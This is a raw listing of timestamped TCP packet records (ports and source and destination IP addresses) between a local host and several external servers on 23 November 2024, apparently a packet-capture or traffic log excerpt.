Nov 23, 2024 07:09:29.877197981 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.877211094 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.877244949 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.877260923 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.919527054 CET	80	49778	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:29.919600964 CET	49778	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:29.933254004 CET	443	49781	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:29.954431057 CET	49781	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:29.954479933 CET	443	49781	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:29.955082893 CET	49781	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:29.955096006 CET	443	49781	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:29.977665901 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.977694035 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.977734089 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.977754116 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.977780104 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.977802038 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.985358953 CET	443	49782	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:29.986016989 CET	443	49783	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:29.986754894 CET	49782	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:29.986778975 CET	443	49782	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:29.987430096 CET	49783	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:29.987458944 CET	443	49783	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:29.987595081 CET	49782	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:29.987601995 CET	443	49782	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:29.989453077 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.989501953 CET	443	49780	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:29.989516973 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.989527941 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.989569902 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.989593029 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.989615917 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.999536037 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.999598980 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.999613047 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.999622107 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.999650955 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.999666929 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.011274099 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.011346102 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.011348963 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.011372089 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.011398077 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.011416912 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.021944046 CET	49783	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.021965027 CET	443	49783	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.022315979 CET	49780	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.022347927 CET	443	49780	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.022969007 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.023011923 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.023037910 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.023045063 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.023072958 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.023101091 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.023389101 CET	49780	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.023401976 CET	443	49780	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.024146080 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.024168968 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.024213076 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.024226904 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.024250031 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.024286985 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.033849955 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.033890009 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.033961058 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.033970118 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.033978939 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.034009933 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.045646906 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.045696974 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.045722961 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.045730114 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.045761108 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.045782089 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.050211906 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.050230026 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.050344944 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.050355911 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.050446987 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.055675030 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.055697918 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.055757046 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.055766106 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.055799007 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.055824041 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.070096016 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.070116043 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.070152044 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.070163012 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.070193052 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.070213079 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.089982033 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.089998960 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.090038061 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.090046883 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.090080023 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.090105057 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.107461929 CET	49778	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:30.136841059 CET	49789	443	192.168.2.6	172.217.17.78
Nov 23, 2024 07:09:30.148523092 CET	49770	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:30.179896116 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.179960966 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.179991007 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.180001020 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.180043936 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.187905073 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.187949896 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.187994957 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.188003063 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.188026905 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.188043118 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.197263002 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.197305918 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.197360992 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.197369099 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.197400093 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.197415113 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.206597090 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.206640005 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.206687927 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.206696033 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.206726074 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.206748009 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.214876890 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.214936018 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.214968920 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.214976072 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.215010881 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.215029955 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.224632025 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.224675894 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.224735975 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.224742889 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.224780083 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.224798918 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.226917982 CET	80	49778	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:30.228833914 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.228877068 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.228908062 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.228916883 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.228971958 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.232753992 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.232796907 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.232844114 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.232851028 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.232877970 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.232892036 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.242012978 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.242058992 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.242090940 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.242099047 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.242129087 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.242149115 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.245100021 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.245124102 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.245275974 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.245275974 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.245286942 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.245323896 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.246537924 CET	443	49785	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:30.246618986 CET	49785	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:30.247663975 CET	49785	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:30.247679949 CET	443	49785	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:30.247955084 CET	443	49785	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:30.248991966 CET	49785	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:30.258460999 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.258479118 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.258521080 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.258533001 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.258557081 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.258579016 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.269876003 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.269893885 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.269970894 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.269979954 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.270036936 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.281168938 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.281186104 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.281263113 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.281270981 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.281315088 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.291765928 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.291789055 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.291860104 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.291867018 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.291908026 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.295340061 CET	443	49785	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:30.301014900 CET	443	49779	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.301179886 CET	443	49779	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.301265001 CET	49779	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.306535959 CET	49779	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.306559086 CET	443	49779	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.306593895 CET	49779	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.306602955 CET	443	49779	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.308701992 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.308721066 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.308788061 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.308796883 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.308830976 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.329417944 CET	49792	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.329463005 CET	443	49792	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.329538107 CET	49792	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.329710007 CET	49792	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.329730034 CET	443	49792	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.355154991 CET	49769	443	192.168.2.6	172.202.163.200
Nov 23, 2024 07:09:30.355169058 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:30.355185032 CET	49769	443	192.168.2.6	172.202.163.200
Nov 23, 2024 07:09:30.355190992 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:30.376049042 CET	443	49781	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.376117945 CET	443	49781	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.376183033 CET	49781	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.376328945 CET	49781	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.376328945 CET	49781	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.376368046 CET	443	49781	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.376396894 CET	443	49781	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.380642891 CET	49793	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.380672932 CET	443	49793	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.380692005 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.380748034 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.380754948 CET	49793	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.380769968 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.380783081 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.380815029 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.380832911 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.387923956 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.387972116 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.388003111 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.388014078 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.388045073 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.388058901 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.396368027 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.396415949 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.396436930 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.396447897 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.396481991 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.396490097 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.398765087 CET	49793	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.398778915 CET	443	49793	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.404606104 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.404652119 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.404671907 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.404681921 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.404714108 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.404735088 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.412976980 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.413043022 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.413068056 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.413077116 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.413119078 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.420768023 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.420810938 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.420834064 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.420840979 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.420876026 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.420895100 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.428072929 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.428117037 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.428158045 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.428164959 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.428210974 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.430397987 CET	443	49783	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.430464029 CET	443	49783	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.431088924 CET	49783	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.431154966 CET	49783	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.431154966 CET	49783	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.431179047 CET	443	49783	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.431200027 CET	443	49783	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.433449030 CET	49794	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.433484077 CET	443	49794	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.433585882 CET	49794	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.433702946 CET	49794	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.433718920 CET	443	49794	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.436399937 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.436449051 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.436487913 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.436496019 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.436532021 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.436546087 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.438558102 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.438579082 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.438635111 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.438644886 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.438692093 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.438711882 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.441483974 CET	443	49780	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.441540956 CET	443	49780	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.441622972 CET	49780	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.441776991 CET	49780	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.441776991 CET	49780	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.441827059 CET	443	49780	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.441855907 CET	443	49780	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.444282055 CET	49795	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.444310904 CET	443	49795	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.444391012 CET	49795	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.444603920 CET	443	49782	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.444684982 CET	443	49782	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.444698095 CET	49795	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.444708109 CET	443	49795	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.444739103 CET	49782	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.444822073 CET	49782	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.444822073 CET	49782	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.444839954 CET	443	49782	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.444866896 CET	443	49782	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.446979046 CET	49796	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.447007895 CET	443	49796	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.447069883 CET	49796	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.447243929 CET	49796	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:30.447253942 CET	443	49796	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:30.448016882 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.448035002 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.448072910 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.448080063 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.448115110 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.448321104 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.448393106 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.456212997 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.456228971 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.456267118 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.456273079 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.456319094 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.465675116 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.465692043 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.465728045 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.465735912 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.465795994 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.474514008 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.474539995 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.474577904 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.474592924 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.474617004 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.474641085 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.483798981 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.483822107 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.483849049 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.483855963 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.483895063 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.483905077 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:30.493256092 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.493271112 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:30.493299007 CET	49775	443	192.168.2.6	150.171.27.10
